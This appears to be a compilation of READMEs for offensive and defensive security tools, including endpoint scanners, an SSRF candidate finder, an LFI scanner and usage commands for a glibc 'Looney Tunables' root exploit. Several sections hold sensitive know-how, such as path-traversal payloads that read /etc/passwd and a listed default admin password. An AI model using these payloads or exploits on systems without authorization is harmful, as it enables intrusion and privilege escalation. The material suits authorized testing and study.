Common usage, scan with 30 threads a list of subdomains using a Chrome user-agent and save the results in a file:
python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
To scan a single domain:
python apidetector.py -d example.com
To scan multiple domains from a file:
python apidetector.py -i input_file.txt
To specify an output file:
python apidetector.py -i input_file.txt -o output_file.txt
To use a specific number of threads:
python apidetector.py -i input_file.txt -t 20
To scan with both HTTP and HTTPS protocols:
python apidetector.py -m -d example.com
To run the script in quiet mode (suppress verbose output):
python apidetector.py -q -d example.com
To run the script with a custom user-agent:
python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
-d, --domain: Single domain to test.
-i, --input: Input file containing subdomains to test.
-o, --output: Output file to write valid URLs to.
-t, --threads: Number of threads to use for scanning (default is 10).
-m, --mixed-mode: Test both HTTP and HTTPS protocols.
-q, --quiet: Disable verbose output (default mode is verbose).
-ua, --user-agent: Custom User-Agent string for requests.
Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, grouped by potential risk level with similar endpoints together (a probing sketch follows the lists):
'/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
'/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
'/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
'/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
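Conceptually, probing these paths boils down to issuing GET requests and inspecting the responses, along the lines of this simplified Python sketch (not APIDetector's actual code; the sample paths and the body check are illustrative):

import requests

SAMPLE_PATHS = ["/swagger-ui.html", "/openapi.json", "/v2/api-docs"]  # from the lists above

def probe(domain, user_agent="Mozilla/5.0"):
    for path in SAMPLE_PATHS:
        url = f"https://{domain}{path}"
        try:
            r = requests.get(url, headers={"User-Agent": user_agent}, timeout=5)
            # A 200 alone is only a candidate; checking the body helps weed
            # out false positives such as catch-all pages.
            if r.status_code == 200 and ("swagger" in r.text.lower() or "openapi" in r.text.lower()):
                print("Exposed:", url)
        except requests.RequestException:
            pass

probe("example.com")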
Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.
The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.
This project is licensed under the MIT License.
Service that scans your Infrastructure as Code for common vulnerabilities.
Aspect | Information |
---|---|
Tool name | IaC Scan Runner |
Docker image | xscanner/runner |
PyPI package | iac-scan-runner |
Documentation | docs |
Contact us | xopera@xlab.si |
The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) packages and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.
This section explains how to run the REST API.
You can run the REST API using a public xscanner/runner Docker image as follows:
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner
Or you can build the image locally and run it as follows:
# build Docker container (it will take some time)
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner
To run using the IaC Scan Runner CLI:
# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run
To run locally from source:
# Export env variables
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled
# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo
# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app
This section shows one possible deployment and short examples of how to use the API calls.
First, we will clone the IaC Scan Runner repository and run the API.
$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up
After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.
curl -X 'POST' \
'http://0.0.0.0:8000/project?creator_id=test' \
-H 'accept: application/json' \
-d ''
A project id will be returned. For this example, the project id is 1e7b2a91-2896-40fd-8d53-83db56088026.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'
That is it.
At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types. This subsection identifies and describes the sequence of steps required for that purpose. For now, these steps have to be performed manually as described below, but the plan is to automate this procedure in the future via the API and provide a user-friendly interface to aid the user in importing new tools into the catalogue of available checks that make up the scan workflow. Figure 16 depicts the required steps for extending the scan workflow with a new tool.
Step 1 – Adding a tool-specific class to the checks directory
First, add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides a generalization of scan workflow tools. Moreover, it is necessary to provide an implementation of the following methods:
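As a rough sketch of such a class (everything here is hypothetical: the import path, constructor signature, and method names are assumptions; the actual interface is defined by the Check base class in the IaC Scan Runner source):

from iac_scan_runner.check import Check  # import path is an assumption

class NewToolCheck(Check):
    def __init__(self):
        # name and description are illustrative placeholders
        super().__init__("new_tool", "Runs the new check tool against IaC packages")

    def run(self, directory):
        # Hypothetical: invoke the underlying tool on the unpacked IaC
        # directory and return its raw output for later summarization.
        raise NotImplementedError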
Step 2 – Adding the check tool class instance within the ScanRunner constructor
Once the new class derived from Check is added to the IaC Scan Runner's source code, it is also required to modify the source code of its main class, called ScanRunner. First, import the tool-specific class, then create a new check tool-specific class instance and add it to the dictionary of IaC checks inside def init_checks(self).
A. Importing the check tool class:
from iac_scan_runner.checks.tfsec import TfsecCheck
B. Creating a new instance of the check tool object inside init_checks:
"""Initiate predefined check objects"""
new_tool = NewToolCheck()
C. Adding it to the self.iac_checks dictionary inside init_checks:
self.iac_checks = {
    new_tool.name: new_tool,
    ...
}
Step 3 – Adding the check tool to the compatibility matrix inside the Compatibility class
Next, inside the file src/iac_scan_runner/compatibility.py, the dictionary that represents the compatibility matrix should be extended as well. There are two possible cases: a) a new file type is added as a key, together with a list of relevant tools as its value, or b) a new tool is added to the compatibility list of an existing file type.
compatibility_matrix = {
    "new_type": ["new_tool_1", "new_tool_2"],
    ...
    "old_typeK": ["tool_1", ... "tool_N", "new_tool_3"]
}
Step 4 – Providing support for result summarization
Finally, the last step in the sequence of modifications required for scan workflow extension is to modify the class ResultsSummary (src/iac_scan_runner/results_summary.py). Specifically, append to its method summarize_outcome a piece of code that looks for tool-specific strings that identify whether the check passed or failed. Inside the loop that traverses the compatible checks, include the following if-else structure for each new tool:
if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"
You can contact the xOpera team by sending an email to xopera@xlab.si.
This project has received funding from the European Union's Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).
A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.
WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:
Does This Tool Bypass 403?
It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.
In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
pip install WebSecProbe
WebSecProbe <URL> <Path>
Example:
WebSecProbe https://example.com admin-login
from WebSecProbe.main import WebSecProbe
if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path
probe = WebSecProbe(url, path)
probe.run()
Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.
LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.
The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.
Unauthorized root access provides attackers unrestricted authority, enabling them to:
LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool:
chmod +x looneypwner.sh
./looneypwner.sh
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.
This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.
Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.
Clone the repository:
git clone https://github.com/HalilDeniz/PathFinder.git
Install the required packages:
pip install -r requirements.txt
This will install all the required modules and their respective versions.
Run the program using the following command:
┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url
Web Information Program
positional arguments:
url Enter the site URL
options:
-h, --help show this help message and exit
Replace <url> with the URL of the website you want to explore.
Here is an example output of running the program:
┌──(root💀denizhalil)-[~/MyProjects/]
└─# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
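The certificate fields shown in this output can be fetched with Python's standard ssl module; a minimal sketch (not PathFinder's actual implementation):

import socket
import ssl

def cert_dates(hostname, port=443):
    # Open a TLS connection and read the peer certificate's validity period.
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    return cert["notBefore"], cert["notAfter"]

print(cert_dates("www.facebook.com"))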
Contributions are welcome! To contribute to PathFinder, follow these steps:
This project is licensed under the MIT License - see the LICENSE file for details.
For any inquiries or further information, you can reach me through the following channels:
Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.
The framework is built around four general vulnerability identification concepts: The vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy to use interface Sirius hopes to enable industry evolution.
To run Sirius, clone this repository and invoke the containers with docker-compose. Note that both docker and docker-compose must be installed to do this.
git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up
The default username and password for Sirius are: admin/sirius
The system is composed of the following services:
To use Sirius, first start all of the services by running docker-compose up. Then, access the web UI at localhost:5173.
If you would like to set up Sirius Scan on a remote machine and access it, you must modify the ./UI/config.json file to include your server details.
Good Luck! Have Fun! Happy Hacking!
Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.
Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.
What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.
Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.
While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.
Identifies Areas of Interest in Source Code: Encourages focused investigation and confirmation rather than indiscriminately labeling everything as a bug.
Identifies Areas of Interest in File Paths (World's First): Recognises patterns in file paths to pinpoint relevant sections for review.
Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.
Automated Scientific Effort Estimation for Code Review (World's First): Provides a measurable approach for estimating the effort required for a code review process.
Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.
Additionally, the tool offers the following functionalities:
Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki
Feel free to contribute towards updating or adding new rules and future development.
If you find any bugs, report them to d3basis.m0hanty@gmail.com.
Python3 and all the libraries listed in requirements.txt
$ pip install virtualenv
$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv
$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate
After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $
You must run the below command after activating the virtual environment as mentioned in the previous steps.
pip install -r requirements.txt
Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.
$ python3 dakshscra.py -h // To view available options and arguments
usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]
options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review
$ python3 dakshscra.py // To view tool usage along with examples
Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshscra.py -r php -t /source_dir_path
# To override default settings, other filetypes can be specified with the '-f' option.
dakshscra.py -r php -f dotnet -t /path_to_source_dir
dakshscra.py -r php -f custom -t /path_to_source_dir
# Perform reconnaissance and rule-based scanning if '-recon' is used with the '-r' option.
dakshscra.py -recon -r php -t /path_to_source_dir
# Perform only reconnaissance if '-recon' is used without the '-r' option.
dakshscra.py -recon -t /path_to_source_dir
# Verbosity: '-v' is default; '-vvv' will display all rule checks within each rule category.
dakshscra.py -r php -vv -t /path_to_source_dir
Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TYPES: dotnet, php, java, custom, allfiles
The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.
Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.
Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.
Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.
Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the pseudo code output looking for potential security vulnerabilities in that pseudo C code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.
This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.
For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.
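For that workflow, feeding output.c into Semgrep is a short script; a minimal sketch (the rules/ path is a placeholder for your own ruleset):

import json
import subprocess

# Run Semgrep over the extracted pseudo code and parse the JSON results.
result = subprocess.run(
    ["semgrep", "--config", "rules/", "--json", "output.c"],
    capture_output=True, text=True,
)
for finding in json.loads(result.stdout).get("results", []):
    print(finding["check_id"], finding["path"], finding["start"]["line"])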
I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep
Requirements:
pip install semgrep
pip install -r requirements.txt
A valid OpenAI API key placed in the config.txt file (required for the -ai option)
To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>
-ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
-o => define an output file, if you want to save the output
-ai and -o are optional parameters
-all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
python callisto.py -b vulnProgram.exe -ai -o results.txt
python callisto.py -b vulnProgram.exe -ai -all -o results.txt
Program Output Example:
surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending an HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.
You can then attempt these hosts wherever an SSRF vulnerability may be present. Because most SSRF filters only focus on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.
Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
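The internal/external split conceptually reduces to resolving each host and checking whether the address falls in a private range; a simplified Python illustration (surf itself is written in Go):

import ipaddress
import socket

def classify(host):
    # Resolve the host and flag private (RFC 1918 and similar) addresses as internal.
    ip = ipaddress.ip_address(socket.gethostbyname(host))
    return "internal" if ip.is_private else "external"

print(classify("example.com"))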
This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.
It can be installed with the following command:
go install github.com/assetnote/surf/cmd/surf@latest
Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:
# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x
The full list of settings can be found below:
β― surf -h
by shubs @ assetnote
Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]
Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit
When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is run from:
external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests to from your machine
These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.
Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.
This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).
Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.
HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.
Before you proceed with the installation, ensure you have the following prerequisites:
pip package manager
Visual Studio Code - Follow the steps in this link: llama-cpp-prereq-install-instructions
cmake
git clone https://github.com/morpheuslord/hackbot.git
cd hackbot
pip install -r requirements.txt
python hackbot.py
The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.
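That first-run check conceptually amounts to the following sketch (the download URL is a placeholder, not the real model location; HackBot's actual logic may differ):

import os
import requests

MODEL_FILE = "llama-2-7b-chat.ggmlv3.q4_0.bin"
MODEL_URL = "https://example.com/path/to/model"  # placeholder URL

if not os.path.exists(MODEL_FILE):
    # Stream the model to disk so the multi-GB file is never held in memory.
    with requests.get(MODEL_URL, stream=True, timeout=30) as r:
        r.raise_for_status()
        with open(MODEL_FILE, "wb") as f:
            for chunk in r.iter_content(chunk_size=1 << 20):
                f.write(chunk)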
To start a conversation with HackBot, run the following command:
python hackbot.py
HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.
Here are some additional commands you can use:
clear_screen: Clears the console screen for better readability.
quit_bot: Quits the chat application.
bot_banner: Prints the default bot banner.
contact_dev: Provides my contact information.
save_chat: Saves the current session's interactions.
vuln_analysis: Does a vulnerability analysis using the scan data or log file.
static_code_analysis: Does a static code analysis using the scan data or log file.
Note: I am working on more addons and more such commands to give a more ChatGPT-like experience.
Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.
I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.
We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:
Submit a pull request to the main branch of this repository.
If you have know-how in training text generation models, your help in improving the code is welcome.
For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:
Instagram: TMRSWRR
LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.
This tool works with geckodriver; it searches URLs for LFI vulnerabilities and, when root file contents appear on the screen, it notifies you of the successful payload.
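Conceptually, that detection loop looks like the following simplified Selenium sketch (not the tool's actual code; the target URL and payload list are illustrative):

from selenium import webdriver

PAYLOADS = ["../../../../etc/passwd", "..%2f..%2f..%2fetc%2fpasswd"]  # illustrative

driver = webdriver.Firefox()  # requires geckodriver on PATH
for payload in PAYLOADS:
    driver.get(f"https://example.com/page?file={payload}")
    # The classic tell: /etc/passwd contents start with the root entry.
    if "root:x:0:0" in driver.page_source:
        print("Successful payload:", payload)
driver.quit()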
git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py
THIS IS FOR LATEST GOOGLE CHROME VERSION
For bug reports or enhancements, please open an issue here.
Copyright 2023
A tool for finding APK infrastructure.
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
pip install -r requirements.txt
python main.py
--help Display help
--path Required path of apk file
--manifest Display manifest informations
--infra Find all infra addresses including ip,domain ex. --infra ip,domain
--whoise Whois all infra including ip,domain ex. --whoise ip,domain
--output Set output file ex. --output out.txt
Example Usage:
1. Find infra (domain and ip) in sample4.apk and write the result to out.txt:
python3 main.py --path sample4.apk --infra domain,ip --output out.txt
python3 main.py --path sample.apk --whois ip
A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).
The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.
Artemis is experimental software, under active development - use at your own risk.
For an up-to-date list of features, please refer to the documentation.
To run the tests, use:
./scripts/test
Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.
To run it locally, use:
pre-commit run --all-files
To set up pre-commit so that it runs before each commit, use:
pre-commit install
To build the documentation, use:
cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html
Please refer to the documentation.
Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.
However obvious it may seem, we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.
Serial No. | Tool Name | Serial No. | Tool Name | |
---|---|---|---|---|
1 | whatweb | 2 | nmap | |
3 | golismero | 4 | host | |
5 | wget | 6 | uniscan | |
7 | wafw00f | 8 | dirb | |
9 | davtest | 10 | theharvester | |
11 | xsser | 12 | fierce | |
13 | dnswalk | 14 | dnsrecon | |
15 | dnsenum | 16 | dnsmap | |
17 | dmitry | 18 | nikto | |
19 | whois | 20 | lbd | |
21 | wapiti | 22 | devtest | |
23 | sslyze |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices. Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attackerβs control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.
Medium: An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack. This includes vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics, denial-of-service vulnerabilities that are difficult to set up, exploits that require an attacker to reside on the same local network as the victim, vulnerabilities where exploitation provides only very limited access, and vulnerabilities that require user privileges for successful exploitation.
Low: An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info: An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict information disclosure as far as possible.
| CVSS v3 Score Range | Severity in Advisory |
|---|---|
| 0.1 - 3.9 | Low |
| 4.0 - 6.9 | Medium |
| 7.0 - 8.9 | High |
| 9.0 - 10.0 | Critical |
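The score-to-severity mapping above is easy to encode. A minimal Python sketch (treating scores below 0.1 as informational is an assumption, since the table starts at 0.1):

```python
def severity_from_cvss(score: float) -> str:
    """Map a CVSS v3 base score to the advisory severity from the table above."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score >= 0.1:
        return "Low"
    return "Info"  # assumption: scores below 0.1 are informational only

print(severity_from_cvss(7.5))  # -> High
```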
Run the program as: python3 web_scan.py https://example.com (or http://example.com)
--help
--update
| Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan |
|---|---|---|---|
| 1 | IPv6 | 2 | Wordpress |
| 3 | SiteMap/Robot.txt | 4 | Firewall |
| 5 | Slowloris Denial of Service | 6 | HEARTBLEED |
